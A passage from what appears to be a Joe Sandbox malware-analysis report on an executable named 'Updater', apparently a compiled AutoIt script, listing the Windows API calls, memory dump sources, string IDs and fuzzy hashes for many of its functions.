                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                    • Opcode ID: 7f67b2c40f06efea2a10f26680fd5fe0ad7c17e66e92ca00156ee3efb1642f8b
                                                                                                                                                    • Instruction ID: 0181480ba1e199a93216cb467656644cf824e5e029751f67d62a84eb924dfbcb
                                                                                                                                                    • Opcode Fuzzy Hash: 7f67b2c40f06efea2a10f26680fd5fe0ad7c17e66e92ca00156ee3efb1642f8b
                                                                                                                                                    • Instruction Fuzzy Hash: F41132B9D0020AEFDB41CF99C884AEEBBF9FB18310F108156E915E3210EB75AA54CF50
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B84DD0
                                                                                                                                                    • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00B84DE4
                                                                                                                                                    • GetParent.USER32 ref: 00B84DF9
                                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?,?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B84E00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$InvalidateParentRectTimeout
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3648793173-0
                                                                                                                                                    • Opcode ID: 6b16c93fd92a4cbf015ba678c5dd66360f393ed0f1c822b520ba7de1acc26a1b
                                                                                                                                                    • Instruction ID: 5c107542ae66a67f6ec6210985a688fbfb647959ddec04060712db72bb2e7e59
                                                                                                                                                    • Opcode Fuzzy Hash: 6b16c93fd92a4cbf015ba678c5dd66360f393ed0f1c822b520ba7de1acc26a1b
                                                                                                                                                    • Instruction Fuzzy Hash: F3F06235200245FBEB345F56DC0DF977FACFB92B41F00425AB955860A0EAA68800DB60
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B33B38: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B33B92
                                                                                                                                                      • Part of subcall function 00B33B38: SelectObject.GDI32(?,00000000), ref: 00B33BA1
                                                                                                                                                      • Part of subcall function 00B33B38: BeginPath.GDI32(?), ref: 00B33BB8
                                                                                                                                                      • Part of subcall function 00B33B38: SelectObject.GDI32(?,00000000), ref: 00B33BE1
                                                                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00BB9270
                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00BB927D
                                                                                                                                                    • EndPath.GDI32(?), ref: 00BB928D
                                                                                                                                                    • StrokePath.GDI32(?), ref: 00BB929B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                    • Opcode ID: 1cc284328eb4a6c7b4645e3fc88f7de9738c5d7e07950b23f51701a4b6eadc97
                                                                                                                                                    • Instruction ID: 2ba52b5278795a23347f3a0bb48913951975351bbac9ba03ac94ccc147911b80
                                                                                                                                                    • Opcode Fuzzy Hash: 1cc284328eb4a6c7b4645e3fc88f7de9738c5d7e07950b23f51701a4b6eadc97
                                                                                                                                                    • Instruction Fuzzy Hash: 45F05E32042259BBDB126F54AC0AFDE3F99AF16321F44C141FA11630E18BF95511CFA6
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B4106D
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B4107C
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00B41085
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00B41092
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                    • Opcode ID: de113961c262b2eaeb6bf93d0cf6867acd075aa986da41d55cd8cd30bba6f63d
                                                                                                                                                    • Instruction ID: 85930f8fc11daf60131f98867ea76bf5ee97d8e4794f167223bfece625d42a9c
                                                                                                                                                    • Opcode Fuzzy Hash: de113961c262b2eaeb6bf93d0cf6867acd075aa986da41d55cd8cd30bba6f63d
                                                                                                                                                    • Instruction Fuzzy Hash: 62F0AF70C1020CEBCB00DBF4D949A9EBBF8FF08301F514AA6E801E7110EB78AB049B55
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00B34A7B
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00B34A85
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00B34A98
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00B34AA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4037423528-0
                                                                                                                                                    • Opcode ID: 1c85161bc6bd1e9f48d9c90d5e322c50f1fda973be554ec2051e136dae08c965
                                                                                                                                                    • Instruction ID: 83e23651a2225e468ee91314a37f37fa293f452f6cfe2ae861c9c3a9c9410f79
                                                                                                                                                    • Opcode Fuzzy Hash: 1c85161bc6bd1e9f48d9c90d5e322c50f1fda973be554ec2051e136dae08c965
                                                                                                                                                    • Instruction Fuzzy Hash: 83E06531684644AFDB205F78AC1DBD97B51EB11332F14C359FBB9550E0DBB205509B21
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00B82748
                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B822E5), ref: 00B8274F
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B822E5), ref: 00B8275C
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B822E5), ref: 00B82763
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                                    • Opcode ID: 73a908b5e85a37065d8acdfbb54ff34a4e705410bd30faf214e7a1c34063a645
                                                                                                                                                    • Instruction ID: e7acfe27b56f9b8e984c130268e7303b892696df030e2ce28c58d419b03c9ccf
                                                                                                                                                    • Opcode Fuzzy Hash: 73a908b5e85a37065d8acdfbb54ff34a4e705410bd30faf214e7a1c34063a645
                                                                                                                                                    • Instruction Fuzzy Hash: DEE086356012119BD7203FB1DE0CB463BACDF447A5F144554B246CA094EABC8841C755
                                                                                                                                                    APIs
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B656F9
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00B65703
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B6570F
                                                                                                                                                    • ReleaseDC.USER32(00000001), ref: 00B65730
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: eeea47fb9ef33a166a636e0654c9465a0321dc3bf6a577ea5cf3a6435d417c2d
                                                                                                                                                    • Instruction ID: cb566800b6de5cc9e5c0ac3ffae3f69ee1a90632c0acefa38e042a9184541de0
                                                                                                                                                    • Opcode Fuzzy Hash: eeea47fb9ef33a166a636e0654c9465a0321dc3bf6a577ea5cf3a6435d417c2d
                                                                                                                                                    • Instruction Fuzzy Hash: 61E01AB5800604EFCB11AFA09808B5DBBF1EB4C321F118185E80EE3210EBB896419F00
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B97A56
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00BBD934), ref: 00B97B2E
                                                                                                                                                      • Part of subcall function 00B327CA: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00B3058E,?,00000001), ref: 00B327FC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFileLibraryLoad_wcslen
                                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                    • API String ID: 3802351006-2806939583
                                                                                                                                                    • Opcode ID: 8f52191c69eb46056d022b8a7618206ec0657d9558144a64981d057e4f2a879e
                                                                                                                                                    • Instruction ID: 32c3edf8aeb307557e70d1e620e3f52d84749327933df43b4959c493f1bfda6d
                                                                                                                                                    • Opcode Fuzzy Hash: 8f52191c69eb46056d022b8a7618206ec0657d9558144a64981d057e4f2a879e
                                                                                                                                                    • Instruction Fuzzy Hash: 7AA15C311082129BCB14EF20D891AAEB7F1FF94704F0449B8F59A972A1DF34EE49CB52
                                                                                                                                                    APIs
                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00B4E1AD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                    • String ID: pow
                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                    • Opcode ID: 1ea1938c96138cf26c3a2b75005d8d9bade5fc7f0b4a12a132e524b174b8747a
                                                                                                                                                    • Instruction ID: 8373d06fb4e3f8a8439f0347ca234ae66e74dcd9afbc94978d157dd51f5992fd
                                                                                                                                                    • Opcode Fuzzy Hash: 1ea1938c96138cf26c3a2b75005d8d9bade5fc7f0b4a12a132e524b174b8747a
                                                                                                                                                    • Instruction Fuzzy Hash: E6518271B8C10196D7127714E95177A2BE4FB40B02F208DE8F8E6572E8DF35CE98AA46
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: #
                                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                                    • Opcode ID: fcb219fdaad092c90461fa3efc0d61084ea112d711518a3966d0f45ace1128fd
                                                                                                                                                    • Instruction ID: 4e5fb5408b00337f7206d6a4474b4cd028778a43a602af53dba02c53cdfd0de3
                                                                                                                                                    • Opcode Fuzzy Hash: fcb219fdaad092c90461fa3efc0d61084ea112d711518a3966d0f45ace1128fd
                                                                                                                                                    • Instruction Fuzzy Hash: 5451D0319042479FDB159F68C491BBABBE1EF15310F2481F6ECA59B390D734AD42CB64
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00B2C9B1
                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B2C9CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                    • Opcode ID: c92928ca4b824a16ee0f23fd5cc8eda4498f1e10cdf59761cf0053fc1fca0f5e
                                                                                                                                                    • Instruction ID: 3aaa363a127a31273e8694aab1766c3369d016aa4b51a9b66dc3eea4e8af88da
                                                                                                                                                    • Opcode Fuzzy Hash: c92928ca4b824a16ee0f23fd5cc8eda4498f1e10cdf59761cf0053fc1fca0f5e
                                                                                                                                                    • Instruction Fuzzy Hash: 0A514972519744ABD320AF50E886BAFBBF8FF84700F41889DF1D891195EF708529CB66
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                                                    • String ID: CALLARGARRAY
                                                                                                                                                    • API String ID: 157775604-1150593374
                                                                                                                                                    • Opcode ID: e283b97a8962b7e5ef7a31120ad3f40cda3dde4f3f6559110bf64888b1d5b977
                                                                                                                                                    • Instruction ID: 877bc39ee2ecceba5358abb39a5f94dde737bbcbdd5a7e9be6f07754bb964e3c
                                                                                                                                                    • Opcode Fuzzy Hash: e283b97a8962b7e5ef7a31120ad3f40cda3dde4f3f6559110bf64888b1d5b977
                                                                                                                                                    • Instruction Fuzzy Hash: 3F419271E001159FCF10EF58C881ABEBBF0EF19714F4481A8E919AB391EB759D45CB90
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BB4FEE
                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB5003
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: '
                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                    • Opcode ID: e42c278ec5c42508b00865e53b7f705ea016999b040f437c217f780b5f496406
                                                                                                                                                    • Instruction ID: 4369f88493aed0ddcd36eac175da52df4da1e1055794ae958563fec13ac435a4
                                                                                                                                                    • Opcode Fuzzy Hash: e42c278ec5c42508b00865e53b7f705ea016999b040f437c217f780b5f496406
                                                                                                                                                    • Instruction Fuzzy Hash: 23410974A0120A9FDB14CF69D880BFABBF5FF49300F1041A9E909AB352D7B1A951CF90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B345AE
                                                                                                                                                      • Part of subcall function 00B34570: GetStockObject.GDI32(00000011), ref: 00B345C2
                                                                                                                                                      • Part of subcall function 00B34570: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B345CC
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00BB4110
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00BB412A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                    • Opcode ID: 95f054c122aab8a768ff193021e9987605badf82e952f0be316e892a23d7028c
                                                                                                                                                    • Instruction ID: 7e0a52d932f16e74e6791307a3afc3f70835a66533db1a8f9d06c7d93e0036b5
                                                                                                                                                    • Opcode Fuzzy Hash: 95f054c122aab8a768ff193021e9987605badf82e952f0be316e892a23d7028c
                                                                                                                                                    • Instruction Fuzzy Hash: 4F21FC72910209AFDB00DFA8CC45AFA7BF8FB18314F014555FD55E3151E775E8519B50
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B9D88E
                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B9D8B7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                    • String ID: <local>
                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                    • Opcode ID: 3a0d199fa4179e5dfbed957d634732d16fc349a3353586584da5732bfaf9ac12
                                                                                                                                                    • Instruction ID: e6d7c067aef7f4a3e5abc8ea93aea3b3466429a8f65a4ec3f213b3b4fd803d0a
                                                                                                                                                    • Opcode Fuzzy Hash: 3a0d199fa4179e5dfbed957d634732d16fc349a3353586584da5732bfaf9ac12
                                                                                                                                                    • Instruction Fuzzy Hash: 6011A071655235BADB284B678CC9FF3BFACEF127A0F0042AAB51983181DA645940D6F0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59
                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B82E74
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
